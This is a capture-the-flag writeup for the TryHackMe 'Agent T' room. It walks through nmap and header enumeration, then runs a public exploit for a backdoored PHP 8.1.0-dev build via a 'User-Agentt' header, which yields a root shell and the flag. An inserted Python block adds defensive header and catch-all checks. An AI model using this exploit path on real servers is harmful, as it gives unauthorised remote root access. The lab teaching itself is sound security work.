TryHackMe | Agent T writeup

Ricardo Ribas
3 min read · Mar 5, 2023


This is one (of many) walkthroughs for the Agent T CTF room. As always, I follow a few simple enumeration steps to expose the potential flaws described in this article.

Enumeration

As usual, I use nmap to see which ports are open.

nmap -sCV $IP-ADDRESS
Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-05 15:22 GMT
Nmap scan report for ip-10-10-29-63.eu-west-1.compute.internal (10.10.29.63)
Host is up (0.034s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http PHP cli server 5.5 or later
|_http-title: Admin Dashboard
MAC Address: 02:42:9E:A9:F8:49 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.19 seconds

From this command, you notice a web server on port 80. Let's access the web page and see if there is anything for us. Nothing promising stands out after reviewing the HTML source code, except that the web page looks really awesome 🤓. As the next step, I used gobuster to brute-force some URIs.

From gobuster, something seemed off, as every request returned 200 OK, which makes the status code useless for telling real paths from catch-all responses. With that in mind, we needed another way in. Following a hint from the CTF, it seemed that we needed to look closely at the HTTP headers returned when requesting the main page.

# FROM THM VM
curl -I http://IP-ADDRESS

HTTP/1.1 200 OK
Host: $IP-ADDRESS
Date: Sun, 05 Mar 2023 15:42:17 GMT
Connection: close
X-Powered-By: PHP/8.1.0-dev
Content-type: text/html; charset=UTF-8

From the output, I was quite curious about the X-Powered-By header. It showed that a development build of PHP (8.1.0-dev) was serving the website. How about we try to find any public exploit for this particular version of PHP? Thankfully, one turned up during my search. You can find it here. In a nutshell, this Python script sends system commands to the server through the User-Agentt HTTP header.
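Two checks from the enumeration above, written up as an added Python example (not code from the original post or from the exploit script): a small parser that flags a pre-release PHP build announced in X-Powered-By, and a helper that tells whether a directory brute-force is hitting a catch-all 200 so that results are filtered by body length instead of status. The response head and the scan results are constructed samples modelled on the writeup.

```python
import re

# Constructed sample modelled on the HEAD response in the writeup (not live traffic).
SAMPLE_HEAD = (
    "HTTP/1.1 200 OK\r\n"
    "Host: 10.10.29.63\r\n"
    "Date: Sun, 05 Mar 2023 15:42:17 GMT\r\n"
    "Connection: close\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\n"
    "Content-type: text/html; charset=UTF-8\r\n\r\n"
)
# Constructed brute-force results: (path, status, body length). "/zz-bogus-8f1c" is a
# deliberately non-existent path used as the baseline for catch-all detection.
SAMPLE_SCAN = [
    ("/", 200, 42145), ("/admin", 200, 42145), ("/index.php", 200, 42145),
    ("/css", 200, 1234), ("/zz-bogus-8f1c", 200, 42145),
]

def parse_head(raw):
    """Return (status_code, {lower-cased header name: value}) from a raw response head."""
    status_line, _, rest = raw.partition("\r\n")
    code = int(status_line.split()[1])
    headers = {}
    for line in rest.split("\r\n"):
        if not line:  # the blank line ends the head
            break
        name, _, value = line.partition(":")  # split on the first colon only
        headers[name.strip().lower()] = value.strip()
    return code, headers

PHP_VERSION = re.compile(r"^PHP/(\d+\.\d+\.\d+)(-\w+)?$")

def check_powered_by(headers):
    """Flag a PHP version exposed via X-Powered-By; a pre-release suffix (-dev, -RC1, ...) is high risk."""
    m = PHP_VERSION.match(headers.get("x-powered-by", ""))
    if not m:
        return None
    version, suffix = m.groups()
    return {"version": version + (suffix or ""), "risk": "high" if suffix else "info"}

def catch_all_filter(results, bogus_path):
    """If the bogus path also gets 200, status is meaningless: return (True, paths whose size differs)."""
    by_path = {p: (s, n) for p, s, n in results}
    base_status, base_len = by_path[bogus_path]
    if base_status != 200:
        return False, [p for p, s, _ in results if s == 200]
    return True, [p for p, s, n in results if p != bogus_path and n != base_len]

if __name__ == "__main__":
    code, hdrs = parse_head(SAMPLE_HEAD)
    print(code, check_powered_by(hdrs))  # 200 {'version': '8.1.0-dev', 'risk': 'high'}
    print(catch_all_filter(SAMPLE_SCAN, "/zz-bogus-8f1c"))  # (True, ['/css'])
```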

By running the Python script, we get an interactive shell and can start sending system commands to the server. For the sake of simplicity, you can find all the commands I ran through the exploit's shell below.

# Execute the exploit script
$ python 49933.py
Enter the full host url:
http://$IP-ADDRESS

Interactive shell is opened on http://IP-ADDRESS
Can't acces tty; job crontol turned off.
$ whoami
root

$ ls -la

total 760
drwxr-xr-x 1 root root 4096 Mar 7 2022 .
drwxr-xr-x 1 root root 4096 Mar 30 2021 ..
-rw-rw-r-- 1 root root 199 Mar 5 2022 .travis.yml
-rw-rw-r-- 1 root root 22113 Mar 5 2022 404.html
-rw-rw-r-- 1 root root 21756 Mar 5 2022 blank.html
drwxrwxr-x 2 root root 4096 Mar 5 2022 css
-rw-rw-r-- 1 root root 3784 Mar 5 2022 gulpfile.js
drwxrwxr-x 2 root root 4096 Mar 5 2022 img
-rw-rw-r-- 1 root root 42145 Mar 7 2022 index.php
drwxrwxr-x 3 root root 4096 Mar 5 2022 js
-rw-rw-r-- 1 root root 642222 Mar 5 2022 package-lock.json
-rw-rw-r-- 1 root root 1493 Mar 5 2022 package.json
drwxrwxr-x 4 root root 4096 Mar 5 2022 scss
drwxrwxr-x 8 root root 4096 Mar 5 2022 vendor

# nothing really happens here
$ cd ..

# staying in the same folder
$ ls
404.html
blank.html
css
gulpfile.js
img
index.php
js
package-lock.json
package.json
scss
vendor

$ find / -type f -name "*.txt" 2>/dev/null
/usr/share/doc/libdb5.3/build_signature_amd64.txt
/usr/share/doc/mount/mount.txt
/usr/share/doc/util-linux/howto-build-sys.txt
/usr/share/doc/util-linux/blkid.txt
/usr/share/doc/util-linux/PAM-configuration.txt
/usr/share/doc/util-linux/mount.txt
/usr/share/doc/util-linux/howto-tests.txt
/usr/share/doc/util-linux/hwclock.txt
/usr/share/doc/util-linux/pg.txt
/usr/share/doc/util-linux/getopt.txt
/usr/share/doc/util-linux/howto-compilation.txt
/usr/share/doc/util-linux/cal.txt
/usr/share/doc/util-linux/modems-with-agetty.txt
/usr/share/doc/util-linux/deprecated.txt
/usr/share/doc/util-linux/howto-debug.txt
/usr/share/doc/util-linux/getopt_changelog.txt
/usr/share/doc/util-linux/release-schedule.txt
/usr/share/doc/util-linux/00-about-docs.txt
/usr/share/doc/util-linux/col.txt
/var/www/html/vendor/fontawesome-free/LICENSE.txt
/flag.txt

In the output of the find command, you can spot a txt file containing the flag. Go grab it!

Conclusion

This CTF was pretty chill and fun at the same time. Kudos to ben, jonhhammond, cmnatic, blacknote and timtaylor for creating this one! 👍
